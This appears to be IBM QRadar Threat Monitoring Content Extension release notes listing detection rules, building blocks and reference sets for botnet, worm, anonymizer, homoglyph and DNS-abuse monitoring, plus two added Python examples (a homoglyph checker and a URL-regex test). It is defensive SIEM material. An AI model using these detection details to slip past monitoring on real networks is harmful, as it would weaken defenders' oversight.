The following table shows the custom properties used in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 that are found in other content extensions.
Custom Property | Optimized | Found In |
---|---|---|
Error Code | Yes | |
Process Name | Yes | |
UrlHost | Yes | |
The following table shows the rules and building blocks in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Type | Name | Description |
---|---|---|
Building Block | BB:DeviceDefinition: DNS | Defines DNS devices on the system. |
Rule | Communication with a Potential Hostile Host (Flows) | Triggers when flow content includes a host that matches known hostile host categorized by
X-force or in the reference set collection. Note: The Malicious URLs,
Malware URLs, and Phishing URLs reference sets must be
populated. The Threat Intelligence App can be used to import threat intel feeds in these reference
sets.
|
Rule | Communication with a Potential Hostile IP Address (Flows) | Triggers when flow content includes an IP that matches known hostile IP addresses categorized
by X-force or in the reference set collection. Note: The Malware IPs, Botnet IPs, Botnet C&C IPs, Phishing IPs, Anonymizer IPs reference sets must be populated. The Threat Intelligence App can be used to import threat intel feeds in these reference sets. |
Rule | Excessive Denied SMB Traffic from a Compromised Host | Triggers when excessive SMB connections tentative are performed from a host categorized as compromised. |
Rule | Potential Homoglyph Usage | Triggers when a domain name contains one or more homoglyph characters, which can make a domain appear identical to a trusted domain while redirecting to a malicious host. The custom function HOMOGLYPH::DETECTED, which is pre-filled with 1792 entries of homoglyph characters, accepts a string and returns true if the string contains a homoglyph character. Note: To view the events that would trigger this rule, use the Potential Homoglyph Usage search. Tune the rule with valid characters before enabling the rule and offense creation. |
Rule | Potential Homoglyph Usage (Flows) | Triggers when a domain name contains one or more homoglyph characters, which can make a domain appear identical to a trusted domain while redirecting to a malicious host. The custom function HOMOGLYPH::DETECTED, which is pre-filled with 1792 entries of homoglyph characters, accepts a string and returns true if the string contains a homoglyph character. Note: To view the flows that would trigger this rule, use the Potential Homoglyph Usage (Flows) search. Tune the rule with valid characters before enabling the rule and offense creation. |
Rule | SMB Traffic Permitted from a Compromised Host | Triggers when SMB traffic has been allowed from a host categorized as compromised. |
Rule | Successful Login From a Compromised Host | Triggers when a successful authentication is performed on a host that has been categorized as compromised. |
Rule | Suspicious DNS Query Length | Triggers when a DNS query is abnormally long, which could indicate DGA or onion domains. |
Rule | Suspicious program initiating DNS Query (Window) | Triggers when a program that is not referenced as legitimate initiates a DNS query. Note: The DNS Application Whitelist reference set must be populated with the applications that are allowed to generate DNS queries. |
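The two Potential Homoglyph Usage rules above rely on HOMOGLYPH::DETECTED, whose internals are not published here. The following added example (not IBM code and not the function's 1792-entry table) shows the same string-in, boolean-out contract with a small constructed confusables subset, decodes the punycode form that DNS payloads actually carry, and adds the comparison against trusted domains that the tuning note calls for.

```python
from typing import Optional

# Constructed subset of confusable (homoglyph) characters, each mapped to the
# ASCII letter it visually imitates. The QRadar function is pre-filled with
# 1792 entries; this table is only for illustration and is not that list.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small a
    "\u0435": "e",  # Cyrillic small ie
    "\u043e": "o",  # Cyrillic small o
    "\u0440": "p",  # Cyrillic small er
    "\u0441": "c",  # Cyrillic small es
    "\u0445": "x",  # Cyrillic small ha
    "\u0456": "i",  # Cyrillic small Byelorussian-Ukrainian i
    "\u03b1": "a",  # Greek small alpha
    "\u03bf": "o",  # Greek small omicron
    "\u0131": "i",  # Latin small dotless i
}


def decode_punycode(name: str) -> str:
    """DNS logs carry internationalized labels as punycode (xn--...). Decode
    each such label so the check sees the characters a user would see."""
    labels = []
    for label in name.split("."):
        if label.lower().startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass  # malformed label: keep it as-is rather than drop the event
        labels.append(label)
    return ".".join(labels)


def homoglyph_detected(name: str) -> bool:
    """Same contract as described for HOMOGLYPH::DETECTED: string in, true if
    any character is in the homoglyph table (here, the constructed subset)."""
    return any(ch in CONFUSABLES for ch in decode_punycode(name))


def skeleton(name: str) -> str:
    """Replace every confusable character with the ASCII letter it imitates so
    the result can be compared with a list of trusted domains."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in decode_punycode(name)).lower()


def impersonated_domain(name: str, trusted: set) -> Optional[str]:
    """Return the trusted domain this name would be mistaken for, or None.
    A homoglyph hit that resembles nothing you trust is the kind of result the
    rule note asks you to tune out via the valid-character list."""
    if not homoglyph_detected(name):
        return None
    s = skeleton(name)
    return s if s in trusted else None


if __name__ == "__main__":
    trusted = {"apple.com", "example.com"}
    # Constructed DNS query names, in the forms seen in event or flow payloads.
    for q in ["apple.com", "xn--pple-43d.com", "\u0435xample.com", "\u0441dn.example.net"]:
        print(q, homoglyph_detected(q), impersonated_domain(q, trusted))
```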
The severity, credibility, relevance, and response limiter are updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
The following table shows the rules that are renamed in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Old Name | New Name |
---|---|
Local: Hidden FTP Server | Local: FTP Detected on Non-Standard Port |
Remote: IM/Chat | Remote: Suspicious Amount of IM/Chat Traffic |
X-Force Premium: Internal Connection to Host Categorized as Malware | X-Force: Internal Connection to Host Categorized as Malware |
X-Force Premium: Internal Host Communicating with Botnet Command and Control URL | X-Force: Internal Host Communicating with Botnet Command and Control URL |
X-Force Premium: Internal Host Communication with Malware URL | X-Force: Internal Host Communication with Malware URL |
X-Force Premium: Internal Hosts Communicating with Host Categorized as Anonymizers | X-Force: Internal Host Communicating with Host Categorized as Anonymizer |
X-Force Premium: Mail Server Sending Mail to Servers Categorized as SPAM | X-Force: Mail Server Sending Mail to Server Categorized as SPAM |
X-Force Premium: Non-Mail Server Sending Mail to Servers Categorized as SPAM | X-Force: Non-Mail Server Sending Mail to Servers Categorized as SPAM |
X-Force Premium: Non-Servers Communicating with External IP Classified as Dynamic | X-Force: Non-Servers Communicating with External IP Classified as Dynamic |
X-Force Premium: Servers Communicating with External IP Classified as Dynamic | X-Force: Servers Communicating with External IP Classified as Dynamic |
The following rules were updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 to use Source Address instead of Source IP:
- Failed Communication to a Malicious Website
- Multiple Threats Detected on Same Host
- Same Threat Detected on Multiple Hosts
- Same Threat Detected on Multiple Servers
- Same Threat Detected on Same Host
- Same Threat Detected on Same Network Different Hosts
The following rules were updated in IBM Security QRadar Threat Monitoring Content Extension 1.2.0 to use Destination Address instead of Destination IP:
- Excessive Denied SMB Traffic From a Compromised Host
- SMB Traffic Permitted From a Compromised Host
- Successful Login From a Compromised Host
The following table shows the reference sets in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Type | Name | Description |
---|---|---|
Reference Data | pulse_imports | Part of the Pulse dashboard. |
Reference Set | Anonymizer IPs | This reference set lists identified anonymizer IP addresses. |
Reference Set | Botnet C&C IPs | This reference set lists identified botnet command and control server IP addresses. |
Reference Set | Botnet IPs | This reference set lists identified botnet IP addresses. |
Reference Set | Compromised Hosts | This reference set lists identified compromised hosts. |
Reference Set | DNS Application Allowlist | This reference set lists the DNS applications that are allowed to generate DNS queries. |
Reference Set | Malicious URLs | This reference set lists identified malicious URLs. |
Reference Set | Malicious Web Categories | This reference set lists identified malicious web categories. |
Reference Set | Malware IPs | This reference set lists identified malware IP addresses. |
Reference Set | Malware URLs | This reference set lists identified malware URLs. |
Reference Set | Phishing IPs | This reference set lists identified phishing IP addresses. |
Reference Set | Phishing URLs | This reference set lists identified phishing URLs. |
The following table shows the saved searches in IBM Security QRadar Threat Monitoring Content Extension 1.2.0.
Name | Description |
---|---|
Potential Homoglyph Usage | Detects usage of homoglyph characters. |
Potential Homoglyph Usage (Flows) | Detects usage of homoglyph characters in flows. |
IBM Security QRadar Threat Monitoring Content Extension 1.1.0
The following table shows the custom properties that are included in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Custom Property | Found in |
---|---|
Threat Name | |
URL | |
Web Category | |
The following table shows the rules and building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Type | Name | Description |
---|---|---|
Building Block | BB:Threats: Suspicious IP Protocol Usage: Illegal TCP Flag Combination | Identifies flows that have an illegal TCP flag combination. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Suspicious ICMP Type Code | Identifies ICMP flows with suspicious Internet Control Message Protocol (ICMP) type codes. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: TCP or UDP Port 0 | Identifies suspicious flows that use port 0. |
Building Block | BB:HostDefinition:Proxy Servers | Edit this building block to define typical proxy servers. Used with the BB:False Positive: Proxy Server False Positives Categories and BB:FalsePositive: Proxy Server False Positive Events building blocks. |
Building Block | BB:CategoryDefinition: Firewall or ACL Accept Event for a FW/Router/Switch Device | Defines firewall or ACL Accept events from firewall, router, and switch devices. |
Building Block | BB:DeviceDefinition: AV/AM | Defines all anti-virus (AV) and anti-malware (AM) on the system. |
Building Block | BB:DeviceDefinition: Proxy | Defines all proxy sources on the system. |
Building Block | BB:DeviceDefinition: FW / Router / Switch | Defines all firewalls, routers, and switches on the system. |
Building Block | BB:CategoryDefinition: Worm Events | Edit this building block to define worm events. This building block only applies to events that are not detected by a custom rule. |
Building Block | BB:CategoryDefinition: Unidirectional Flow SRC | |
Building Block | BB:Flowshape: Outbound Only | Matches flows that are outbound only. |
Building Block | BB:CategoryDefinition: Recon Event Categories | Edit this building block to include all events that indicate reconnaissance activity. |
Building Block | BB:CategoryDefinition: Suspicious Event Categories | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Scanning: ICMP Scan Low | Identifies a low level of ICMP reconnaissance. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Zero Payload Bidirectional Flows | Identifies bidirectional traffic that doesn't include payload. |
Building Block | BB:Threats: Scanning: Scan High | Identifies a high level of potential reconnaissance. |
Building Block | BB:CategoryDefinition: Unidirectional Flow | |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Unidirectional ICMP Replys | Identifies traffic where ICMP replies are seen with no request. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Unidirectional ICMP Flows | Identifies unidirectional ICMP flows. |
Building Block | BB:Flowshape: Inbound Only | Matches flows that are inbound only. |
Building Block | BB:CategoryDefinition: Recon Flows | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Port Scans: UDP Port Scan | Identifies UDP based port scans. |
Building Block | BB:Threats: Scanning: ICMP Scan Medium | Identifies a medium level of ICMP reconnaissance. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows Low | Detects potential reconnaissance activity where the source packet count is greater than 500. |
Building Block | BB:CategoryDefinition: Suspicious Flows | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:CategoryDefinition: Suspicious Events | Edit this building block to include all events that indicate suspicious activity. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Long Duration Outbound Flow | Identifies flows that have been active for more than 48 hours. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows Medium | Detects potential reconnaissance activity where the source packet count is greater than 5,000. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Large ICMP Packets | Identifies flows with abnormally large ICMP packets. |
Building Block | BB:Threats: Scanning: ICMP Scan High | Identifies a high level of ICMP reconnaissance. |
Building Block | BB:Threats: Port Scans: Host Scans | Identifies potential reconnaissance by flows. |
Building Block | BB:Threats: Scanning: Scan Medium | Identifies a medium level of potential reconnaissance. |
Building Block | BB:Threats: Scanning: Scan Low | Identifies a low level of potential reconnaissance. |
Building Block | BB:CategoryDefinition: Recon Events | Edit this building block to include all events that indicate reconnaissance activity. |
Building Block | BB:Threats: Scanning: Potential Scan | Identifies potential reconnaissance by flows. |
Building Block | BB:CategoryDefinition: Unidirectional Flow DST | |
Building Block | BB:Threats: Suspicious IP Protocol Usage:Unidirectional TCP Flows | Identifies unidirectional TCP flows. |
Building Block | BB:CategoryDefinition: Mail Policy Violation | Edit this building block to include anything you consider to be a mail based policy violation. For example, outbound traffic on port 25 not originating from a mail server. |
Building Block | BB:Threats: Scanning: Empty Responsive Flows High | Detects potential reconnaissance activity where the source packet count is greater than 100,000. |
Building Block | BB:Threats: Suspicious IP Protocol Usage: Large DNS Packets | Identifies flows with abnormally large DNS packets. |
Building Block | BB:Threats: Suspicious IP Protocol Usage:Unidirectional UDP and Misc Flows | Identifies unidirectional UDP and other miscellaneous flows. |
Rule | Remote Proxy or Anonymization Service (Inbound) | |
Rule | Remote Proxy or Anonymization Service (Outbound) | |
Rule | WormDetection: Successful Connections to the Internet on Common Worm Ports | Updated a rule test to remove two building blocks and use a new one to validate against successful connections only: |
Rule | Successful Inbound Connection from a Known Botnet CandC | Rule conditions updated to filter events/flows correctly. |
Rule | Communication with a web site that has been involved in previous SQL injection | Rule renamed (the name used to say site rather than web site). |
Rule | Communication with a web site that is listed on a known blacklist or uses fast flux | Rule renamed (the name used to say site rather than web site). |
Rule | Chained Exploit Followed by Suspicious Events on Third Host | Reports an exploit or attack type activity from the same source IP followed by suspicious account activity from the same destination IP as the original event within 15 minutes, if the source IP is not equal to the destination IP. This rule is disabled by default because it is intended as an alternative to the Chained Exploit Followed by Suspicious Events rule, which ignores events with the same source and destination IP. |
Rule | Multiple Threats Detected on Same Host | Indicates that multiple threats are detected on the same host. |
Rule | Same Threat Detected on Multiple Hosts | Indicates that the same threat is detected on multiple hosts that are not servers. |
Rule | Same Threat Detected on Multiple Servers | Indicates that the same threat is detected on multiple hosts that are servers. |
Rule | Same Threat Detected on Same Host | Indicates that the same threat is detected on the same host. This might indicate that the AV is cleaning a file that is generated by the threat and not the threat itself. The time window should be large enough to cover at least two cycles of checks made by the AV. |
Rule | Same Threat Detected on Same Network Different Hosts | Indicates that the same threat is detected on different hosts in the same network hierarchy. |
Rule | Failed Communication to a Malicious Website | Alerts when a failed communication to a malicious website is made. |
Rule | Successful Communication to a Malicious Website | Alerts when a successful communication to a malicious website is made. |
The following table shows the reference data that is updated in IBM Security QRadar Threat Monitoring Content Extension 1.1.0.
Type | Name | Description |
---|---|---|
Reference Set | Malicious Web Categories | Defines malicious web categories. It is prepopulated with seven malicious web categories. |
IBM Security QRadar Threat Monitoring Content Extension 1.0.3
The following table shows the rules that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.3.
Type | Name | Change description |
---|---|---|
Rule | Successful Inbound Connection from a Known Botnet Command and Control | Updated a rule test to change an 'any' value to 'all'. Administrators who modified this rule need to review their rule tests to confirm that the all value is set: |
IBM Security QRadar Threat Monitoring Content Extension 1.0.2
The following table shows the building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.2.
Type | Name | Change description |
---|---|---|
Building Block | BB:Suspicious: Remote: Unidirectional UDP or Misc Flows | Updated the last rule test of the remote flows BB to use one of the following tests: |
Building Block | BB:Suspicious: Local: Unidirectional UDP or Misc Flows | Updated the last rule test of the local flows BB to use one of the following tests: |
IBM Security QRadar Threat Monitoring Content Extension 1.0.1
The following table shows the building blocks that are updated in IBM Security QRadar Threat Monitoring Content Extension 1.0.1.
Type | Name | Change description |
---|---|---|
Rule | Botnet: Potential Botnet Connection (DNS) | Added a rule test: |
Rule | WormDetection: Successful Connections to the internet on Common Worm Ports | Added a rule test: |
Rule | Botnet: Successful Inbound Connection from a Known Botnet Command and Control | Added a rule test: |
Building Block | BB:DeviceDefinition: FW / Router / Switch | No updates. Dependent on another rule and must be included in the extension framework. |
Building Block | BB:CategoryDefinition: Pre DMZ Jump | No updates. Dependent on another rule and must be included in the extension framework. |
Building Block | BB:CategoryDefinition: Post DMZ Jump | No updates. Dependent on another rule and must be included in the extension framework. |
IBM Security QRadar Threat Monitoring Content Extension 1.0.0
The Threat Theme extension adds 2 custom event properties for identifying URLs, 10 reference sets, 58 threat-related rules, and 56 building blocks, for a total of 126 content add-ons for QRadar. This extension (content pack) is required for any administrators with X-Force Premium IP Reputation Feeds enabled on their IBM QRadar SIEM appliances. Installing this content adds the required X-Force rules that work with the reputation feeds from the IBM X-Force Exchange.
Custom event properties added by the threat extension
Name | Regex |
---|---|
URL | \(URL=(.*?)\) |
URL | (?:cs-uri=| )(?:http|ftp|tcp|https):\/\/(.+?)\s |
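To show what these two expressions actually capture, here is an added example (not part of the IBM content or its documentation) that runs the regexes from the table over constructed payloads. The last two payloads show shapes the second expression does not match: a URL at the very end of the payload (no trailing whitespace for `\s`) and a URL at the very start (no preceding space or `cs-uri=`).

```python
import re
from typing import List, Optional

# The two regexes listed for the URL custom event property, copied as given.
URL_PATTERNS = [
    re.compile(r"\(URL=(.*?)\)"),
    re.compile(r"(?:cs-uri=| )(?:http|ftp|tcp|https):\/\/(.+?)\s"),
]


def extract_url(payload: str) -> Optional[str]:
    """Try each regex in order and return the first capture group that matches,
    or None when neither expression fires on the payload."""
    for pattern in URL_PATTERNS:
        match = pattern.search(payload)
        if match:
            return match.group(1)
    return None


# Constructed sample payloads; they are not real device output.
SAMPLE_PAYLOADS = [
    # Key=value style with the URL in parentheses: first regex, scheme included.
    "Jan 10 12:00:01 proxy1 web_request user=jdoe (URL=http://files.example.test/setup.exe) action=allow",
    # W3C extended log style: second regex, capture starts after the scheme.
    "2024-01-10 12:00:02 10.0.0.5 GET cs-uri=https://cdn.example.test/js/app.js 200 1234",
    # URL preceded by a space and followed by one: second regex still matches.
    "client 10.0.0.7 connected to ftp://mirror.example.test/pub/ in 35ms",
    # URL at the very end of the payload: the trailing \s never matches, so no value.
    "client 10.0.0.7 connected to http://mirror.example.test/pub/",
    # URL at the very start of the payload: neither 'cs-uri=' nor a space precedes it.
    "https://start.example.test/x 200",
]


def extract_all(payloads: List[str]) -> List[Optional[str]]:
    """Run the property extraction over a batch of payloads, preserving order."""
    return [extract_url(p) for p in payloads]


if __name__ == "__main__":
    for payload, url in zip(SAMPLE_PAYLOADS, extract_all(SAMPLE_PAYLOADS)):
        print(f"{url!r:45} <- {payload}")
```

Note that the first expression keeps the scheme while the second drops it, so the same property can hold two differently shaped values depending on which regex matched.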
The following table shows the reference sets that are added in IBM Security QRadar Threat Monitoring Content Extension 1.0.0.
Name | Type |
---|---|
DNS Servers | Reference set |
Database Servers | Reference set |
DHCP Servers | Reference set |
FTP Servers | Reference set |
LDAP Servers | Reference set |
Mail Servers | Reference set |
Proxy Servers | Reference set |
SSH Servers | Reference set |
Web Servers | Reference set |
Windows Servers | Reference set |
The following table shows the rules that are added in IBM Security QRadar Threat Monitoring Content Extension 1.0.0.
Name | Category |
---|---|
X-Force Premium: Internal Host Communication with Malware URL | Threats (X-Force) |
X-Force Premium: Internal Connection to Host Categorized as Malware | Threats (X-Force) |
X-Force Premium: Internal Host Communicating with Botnet Command and Control URL | Threats (X-Force) |
X-Force Premium: Internal Hosts Communicating with Host Categorized as Anonymizers | Threats (X-Force) |
X-Force Premium: Servers Communicating with External IP Classified as Dynamic | Threats (X-Force) |
X-Force Premium: Non-Servers Communicating with External IP Classified as Dynamic | Threats (X-Force) |
X-Force Premium: Non-Mail Server Sending Mail to Servers Categorized as SPAM | Threats (X-Force) |
X-Force Premium: Mail Server Sending Mail to Servers Categorized as SPAM | Threats (X-Force) |
Local Mass Mailing Host Detected | Post-Intrusion Activity |
Remote: Client Based DNS Activity to the Internet | Post-Intrusion Activity |
Possible Local Worm Detected | Post-Intrusion Activity |
Local: Hidden FTP Server | Post-Intrusion Activity |
Local: SSH or Telnet Detected on Non-Standard Port | Post-Intrusion Activity |
Successful Connections to the Internet on Common Worm Ports | Post-Intrusion Activity |
Worm Detected (Events) | Post-Intrusion Activity |
Local Host Sending Malware | Malware |
Remote: IRC Connections | Compliance |
Remote: IM/Chat | Compliance |
Remote: Local P2P Server Detected | Compliance |
Remote: Usenet Usage | Compliance |
Remote: SSH or Telnet Detected on Non-Standard Port | Compliance |
Remote: Local P2P Client Detected | Compliance |
Remote: Local P2P Client Connected to more than 100 Servers | Compliance |
Remote: Local P2P Server connected to more than 100 Clients | Compliance |
Remote: Hidden FTP Server | Compliance |
Communication with a website known to be involved in botnet activity | Threats |
Local: Hidden FTP Server | Threats |
Local: SSH or Telnet Detected on Non-Standard Port | Threats |
Remote: Local P2P Client Detected | Threats |
Connection to a Remote Proxy or Anonymization Service (Outbound) | Threats |
Communication with a website known to be associated with the Russian business network | Threats |
Communication with a website known to aid in distribution of malware | Threats |
Potential Botnet Connection (DNS) | Threats |
Remote: IM/Chat | Threats |
Potential Botnet Events Become Offenses | Threats |
Remote: Hidden FTP Server | Threats |
Potential Honeypot Access | Threats |
Successful Inbound Connection from a Known Botnet CandC | Threats |
Remote: Local P2P Server Detected | Threats |
Remote: Local P2P Server connected to more than 100 Clients | Threats |
Remote: SMTP Mail Sender | Threats |
Remote: SSH or Telnet Detected on Non-Standard Port | Threats |
Communication with a site that has been involved in previous SQL injection | Threats |
Potential Connection to a Known Botnet CandC | Threats |
Local host on Botnet CandC List (SRC) | Threats |
Local host on Botnet CandC List (DST) | Threats |
Communication with a website known to be delivering code which may be a trojan | Threats |
Communication with a website known to be a phishing or fraud site | Threats |
Communication with a site that is listed on a known blacklist or uses fast flux | Threats |
Connection to a Remote Proxy or Anonymization Service (Inbound) | Threats |
Remote: Local P2P Client Connected to more than 100 Servers | Threats |
Remote: IRC Connections | Botnet |
Potential Botnet Connection (DNS) | Botnet |
Potential Botnet Events Become Offenses | Botnet |
Successful Inbound Connection from a Known Botnet CandC | Botnet |
Potential Connection to a Known Botnet CandC | Botnet |
Local host on Botnet CandC List (SRC) | Botnet |
Local host on Botnet CandC List (DST) | Botnet |
The following table shows the building blocks that are added in IBM Security QRadar Threat Monitoring Content Extension 1.0.0.
Name | Category |
---|---|
BB:ProtocolDefinition: Windows Protocols | Port\Protocol Definition |
BB:PortDefinition: Database Ports | Port\Protocol Definition |
BB:PortDefinition: FTP Ports | Port\Protocol Definition |
BB:PortDefinition: IRC Ports | Port\Protocol Definition |
BB:PortDefinition: Windows Ports | Port\Protocol Definition |
BB:PortDefinition: SNMP Ports | Port\Protocol Definition |
BB:PortDefinition: RPC Ports | Port\Protocol Definition |
BB:PortDefinition: Syslog Ports | Port\Protocol Definition |
BB:PortDefinition: SSH Ports | Port\Protocol Definition |
BB:PortDefinition: LDAP Ports | Port\Protocol Definition |
BB:PortDefinition: Mail Ports | Port\Protocol Definition |
BB:PortDefinition: DNS Ports | Port\Protocol Definition |
BB:PortDefinition: DHCP Ports | Port\Protocol Definition |
BB:PortDefinition: Web Ports | Port\Protocol Definition |
BB:PortDefinition: Common Worm Ports | Port\Protocol Definition |
BB:HostReference: LDAP Servers | Host Definitions |
BB:HostDefinition: Virus Definition and Other Update Servers | Host Definitions |
BB:HostDefinition: FTP Servers | Host Definitions |
BB:HostDefinition: DMZ Assets | Host Definitions |
BB:HostReference: Web Servers | Host Definitions |
BB:HostDefinition: Windows Servers | Host Definitions |
BB:HostDefinition: Servers | Host Definitions |
BB:HostReference: FTP Servers | Host Definitions |
BB:HostDefinition: SSH Servers | Host Definitions |
BB:HostDefinition: Database Servers | Host Definitions |
BB:HostDefinition: LDAP Servers | Host Definitions |
BB:HostDefinition: Web Servers | Host Definitions |
BB:HostDefinition: Syslog Servers and Senders | Host Definitions |
BB:HostDefinition: Mail Servers | Host Definitions |
BB:HostDefinition: DNS Servers | Host Definitions |
BB:HostReference: Windows Servers | Host Definitions |
BB:HostDefinition: VoIP PBX Server | Host Definitions |
BB:HostReference: DNS Servers | Host Definitions |
BB:HostReference: Database Servers | Host Definitions |
BB:HostDefinition: RPC Servers | Host Definitions |
BB:HostReference: SSH Servers | Host Definitions |
BB:HostReference: Mail Servers | Host Definitions |
BB:HostDefinition: Network Management Servers | Host Definitions |
BB:HostDefinition: DHCP Servers | Host Definitions |
BB:HostDefinition: Proxy Servers | Host Definitions |
BB:HostReference: Proxy Servers | Host Definitions |
BB:HostDefinition: SNMP Sender or Receiver | Host Definitions |
BB:HostReference: DHCP Servers | Host Definitions |
BB:Policy Violation: IRC IM Policy Violation: IRC Connection to Internet | Policy |
BB:Policy Violation: Mail Policy Violation: Outbound Mail Sender | Policy |
BB:Policy Violation: IRC IM Policy Violation: IM Communications | Policy |
BB:Policy Violation: Application Policy Violation: NNTP to Internet | Policy |
BB:CategoryDefinition: IRC Detection based on Firewall Events | Category Definitions |
BB:CategoryDefinition: Firewall or ACL Accept | Category Definitions |
BB:CategoryDefinition: Any Flow | Category Definitions |
BB:CategoryDefinition: Successful Communication | Category Definitions |
BB:CategoryDefinition: IRC Detected based on Event Category | Category Definitions |
BB:CategoryDefinition: IRC Detected based on Application | Category Definitions |
BB:CategoryDefinition: Firewall or ACL Denies | Category Definitions |
BB:Suspicious: Remote: Unidirectional UDP or Misc Flows | Category Definitions |
BB:Suspicious: Local: Unidirectional UDP or Misc Flows | Category Definitions |
BB:NetworkDefinition: Honeypot like Addresses | Network Definition |
BB:Threats: DoS: Potential Multihost Attack | Threats |